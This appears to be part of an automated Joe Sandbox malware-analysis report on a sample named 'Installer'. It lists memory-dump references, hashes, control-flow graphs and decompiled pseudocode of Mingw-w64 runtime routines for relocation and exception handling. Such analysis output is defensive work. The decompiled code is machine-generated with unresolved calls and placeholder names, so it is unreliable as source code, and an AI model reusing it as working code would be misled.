                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                    • String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
                                                                                                                                                                    • API String ID: 384173800-1835852900
                                                                                                                                                                    • Opcode ID: ccfcc1858fffe05e83cd8f4b56f91afb04c1d2d66080b13f9ed332ea3aaf60c4
                                                                                                                                                                    • Instruction ID: eed5375bffc62892a95b19f1fe52c864bfef9821b9473b2077053bb9c28dcd90
                                                                                                                                                                    • Opcode Fuzzy Hash: ccfcc1858fffe05e83cd8f4b56f91afb04c1d2d66080b13f9ed332ea3aaf60c4
                                                                                                                                                                    • Instruction Fuzzy Hash: A20171B2904364EBC710BF78BA0825EBFF4EB85351F01456DE9899B200D77484A8CB97
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0012162F Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0baa4834d8753574cd6fec8884f74269fb100463ea8f6d98ef03e305b30ef1bb
                                                                                                                                                                    • Instruction ID: fed6ac6136aee27c95fd8737bb7d5d74774d62f4a628a3c1ca7c174b0b1826cc
                                                                                                                                                                    • Opcode Fuzzy Hash: 0baa4834d8753574cd6fec8884f74269fb100463ea8f6d98ef03e305b30ef1bb
                                                                                                                                                                    • Instruction Fuzzy Hash: F0018F30B04548AFCB08CF6DC881B9EB7F6EB8D204F58C1A5E924DB355D274EE119B90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00121CF0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 131filememoryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 196 121cf0-121d5e call 122a10 fwrite call 122a10 vfprintf abort 202 121e70-121e72 196->202 203 121d64-121d6f 196->203 204 121d8e-121d9c call 122750 202->204 205 121d70-121d74 203->205 211 121da2-121de8 call 122860 VirtualQuery 204->211 212 121e97-121ec3 call 121cf0 204->212 206 121d76-121d7e 205->206 207 121d84-121d8c 205->207 206->207 209 121e09-121e0f 206->209 207->204 207->205 218 121e77-121e8e 211->218 219 121dee-121df8 211->219 221 121ed0-121f19 call 1227d0 call 1229c0 212->221 222 121ec5-121ecc 212->222 218->212 220 121e92 call 121cf0 218->220 223 121e02 219->223 224 121dfa-121e00 219->224 220->212 221->222 233 121f1b-121f24 221->233 223->209 224->223 226 121e10-121e4e VirtualProtect 224->226 226->223 228 121e50-121e69 GetLastError call 121cf0 226->228 228->202 234 121fd0-121fd2 233->234 235 121f2a 233->235 236 122120 234->236 237 121fd8-121fe5 234->237 238 121f2f-121f31 235->238 239 122125-12212b 236->239 240 122160 237->240 241 121feb-121ff6 237->241 238->239 242 121f37-121f3c 238->242 239->222 243 122131-122156 call 121d50 239->243 245 12216a-122196 call 121cf0 240->245 241->238 242->239 244 121f42-121f48 242->244 252 122158 243->252 244->245 246 121f4e-121f57 244->246 254 1221c1-1221c5 245->254 255 122198-1221bf 245->255 246->222 248 121f5d 246->248 251 121f60-121f8b 248->251 256 122020-12203d 251->256 257 121f91-121f94 251->257 258 122070-122077 252->258 261 1221c7-1221ca 254->261 255->261 259 122057-12205e call 121d50 256->259 260 12203f-122045 256->260 262 122000-122003 257->262 263 121f96-121fa0 257->263 258->222 264 12207d-122089 258->264 284 122061-12206a 259->284 265 12204b-122051 260->265 266 121fae-121fcb call 121cf0 260->266 272 1220d0-1220e8 262->272 273 122009-12201c call 121cf0 262->273 269 122110-122119 call 121d50 263->269 270 121fa6-121fa8 263->270 271 122090-1220a0 264->271 265->259 265->266 266->234 269->284 270->266 270->269 277 1220a2-1220b9 VirtualProtect 271->277 278 1220bc-1220c5 271->278 279 1220ea-1220ed 272->279 280 1220ff-12210a call 121d50 272->280 273->256 277->278 278->271 285 1220c7-1220ce 278->285 279->266 286 1220f3-1220f9 279->286 280->284 284->251 284->258 286->266 286->280
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Address %p has no image-section, xrefs: 00121E9B
                                                                                                                                                                    • Mingw-w64 runtime failure:, xrefs: 00121D18
                                                                                                                                                                    • VirtualProtect failed with code 0x%x, xrefs: 00121E56
                                                                                                                                                                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00121E87
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000202000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000204000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000229000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306047748.000000000022D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306067690.0000000000236000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306080099.0000000000239000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306494076.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306511138.00000000002EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306605590.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306611664.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.306631116.0000000000356000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_120000_Installer.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
                                                                                                                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                                    • API String ID: 1616349570-1534286854
                                                                                                                                                                    • Opcode ID: 1e73ff2b52eae1fa8a79609188ce2092e3eaaf0f43f878fb79121eeb7c238f0c
                                                                                                                                                                    • Instruction ID: 40c6e4671070d5ab866480acdc45aafb2ffb4d5135bc38e334d3060cf09611f5
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e73ff2b52eae1fa8a79609188ce2092e3eaaf0f43f878fb79121eeb7c238f0c
                                                                                                                                                                    • Instruction Fuzzy Hash: D3517CB5904311EFC710EF28E88561EFBE0FF94350F458A2DE8889B655D330E8A5CB92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 001221E0 Relevance: 12.1, APIs: 8, Instructions: 89COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 297 1221e0-1221f1 298 1221f3-1221f8 297->298 299 122230-122235 297->299 300 1222c0-1222d7 signal 298->300 301 1221fe-122203 298->301 302 1222f1-122308 signal 299->302 303 12223b-122240 299->303 309 1222d9-1222db 300->309 310 122330-122349 signal 300->310 304 122205-12220a 301->304 305 12227a-122291 signal 301->305 308 12230a-122328 signal call 121ce0 302->308 302->309 306 122242-122259 signal 303->306 307 122273-122278 303->307 304->302 311 122210-122217 304->311 316 122297-122299 305->316 317 12234e-122365 signal 305->317 312 12236a-122381 signal 306->312 313 12225f-122261 306->313 307->305 307->311 315 1222b2-1222b6 308->315 309->311 318 1222e1-1222ef 309->318 310->315 319 1222b0 311->319 320 12221d-122224 311->320 312->315 313->311 321 122263-122271 313->321 316->311 323 12229f-1222ad 316->323 317->315 318->315 319->315 320->299 321->315 323->315
                                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                                    			E001221E0(signed int** _a4) {
				intOrPtr _v24;
				signed int** _t25;
				intOrPtr* _t26;

				_t26 =  &_v24;
				_t25 = _a4;
				_t12 =  *( *_t25);
				if(_t12 <= 0xc0000091) {
					if(_t12 >= 0xc000008d) {
						L20:
						_v24 = 0;
						 *_t26 = 8;
						L00122AB0();
						if(_t12 != 1) {
							L18:
							if(_t12 == 0) {
								L4:
								_t12 =  *0x15107c;
								if( *0x15107c == 0) {
									return 0;
								}
								_a4 = _t25;
								_t26 = _t26 + 0x18;
								_pop(_t25);
								goto __eax;
							}
							 *_t26 = 8;
							 *_t12();
							return 0xffffffff;
						}
						_v24 = 1;
						 *_t26 = 8;
						L00122AB0();
						E00121CE0(_t12);
						return 0xffffffff;
					}
					if(_t12 != 0xc0000005) {
						if(_t12 != 0xc000001d) {
							goto L4;
						}
						L12:
						_v24 = 0;
						 *_t26 = 4;
						L00122AB0();
						if(_t12 == 1) {
							_v24 = 1;
							 *_t26 = 4;
							L00122AB0();
							return _t12 | 0xffffffff;
						}
						if(_t12 == 0) {
							goto L4;
						}
						 *_t26 = 4;
						 *_t12();
						return 0xffffffff;
					}
					_v24 = 0;
					 *_t26 = 0xb;
					L00122AB0();
					if(_t12 == 1) {
						_v24 = 1;
						 *_t26 = 0xb;
						L00122AB0();
						return _t12 | 0xffffffff;
					}
					if(_t12 == 0) {
						goto L4;
					}
					 *_t26 = 0xb;
					 *_t12();
					return 0xffffffff;
				}
				if(_t12 == 0xc0000094) {
					_v24 = 0;
					 *_t26 = 8;
					L00122AB0();
					if(_t12 == 1) {
						_v24 = 1;
						 *_t26 = 8;
						L00122AB0();
						return 0xffffffff;
					}
					goto L18;
				}
				if(_t12 == 0xc0000096) {
					goto L12;
				}
				if(_t12 == 0xc0000093) {
					goto L20;
				}
				goto L4;
			}






                                                                                                                                                                    0x001221e1
                                                                                                                                                                    0x001221e4
                                                                                                                                                                    0x001221ea
                                                                                                                                                                    0x001221f1
                                                                                                                                                                    0x00122235
                                                                                                                                                                    0x001222f1
                                                                                                                                                                    0x001222f1
                                                                                                                                                                    0x001222f9
                                                                                                                                                                    0x00122300
                                                                                                                                                                    0x00122308
                                                                                                                                                                    0x001222d9
                                                                                                                                                                    0x001222db
                                                                                                                                                                    0x00122210
                                                                                                                                                                    0x00122210
                                                                                                                                                                    0x00122217
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001222b0
                                                                                                                                                                    0x0012221d
                                                                                                                                                                    0x00122221
                                                                                                                                                                    0x00122224
                                                                                                                                                                    0x00122225
                                                                                                                                                                    0x00122225
                                                                                                                                                                    0x001222e1
                                                                                                                                                                    0x001222e8
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001222ea
                                                                                                                                                                    0x0012230a
                                                                                                                                                                    0x00122312
                                                                                                                                                                    0x00122319
                                                                                                                                                                    0x0012231e
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00122323
                                                                                                                                                                    0x00122240
                                                                                                                                                                    0x00122278
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0012227a
                                                                                                                                                                    0x0012227a
                                                                                                                                                                    0x00122282
                                                                                                                                                                    0x00122289
                                                                                                                                                                    0x00122291
                                                                                                                                                                    0x0012234e
                                                                                                                                                                    0x00122356
                                                                                                                                                                    0x0012235d
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00122362
                                                                                                                                                                    0x00122299
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0012229f
                                                                                                                                                                    0x001222a6
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001222a8
                                                                                                                                                                    0x00122242
                                                                                                                                                                    0x0012224a
                                                                                                                                                                    0x00122251
                                                                                                                                                                    0x00122259
                                                                                                                                                                    0x0012236a
                                                                                                                                                                    0x00122372
                                                                                                                                                                    0x00122379
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0012237e
                                                                                                                                                                    0x00122261
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00122263
                                                                                                                                                                    0x0012226a
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0012226c
                                                                                                                                                                    0x001221f8
                                                                                                                                                                    0x001222c0
                                                                                                                                                                    0x001222c8
                                                                                                                                                                    0x001222cf
                                                                                                                                                                    0x001222d7
                                                                                                                                                                    0x00122330
                                                                                                                                                                    0x00122338
                                                                                                                                                                    0x0012233f
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00122344
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x001222d7
                                                                                                                                                                    0x00122203
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x0012220a
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000

                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.304915609.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.304906143.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304937444.0000000000123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.304942769.0000000000124000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305120624.0000000000152000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000155000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.0000000000157000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305132062.000000000015B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305154315.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305160103.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305172976.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.0000000000164000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.000000000019F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001AF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.305181966.00000000001B3000.00000080.00000001.01000000.00000003.sdmpDownload File
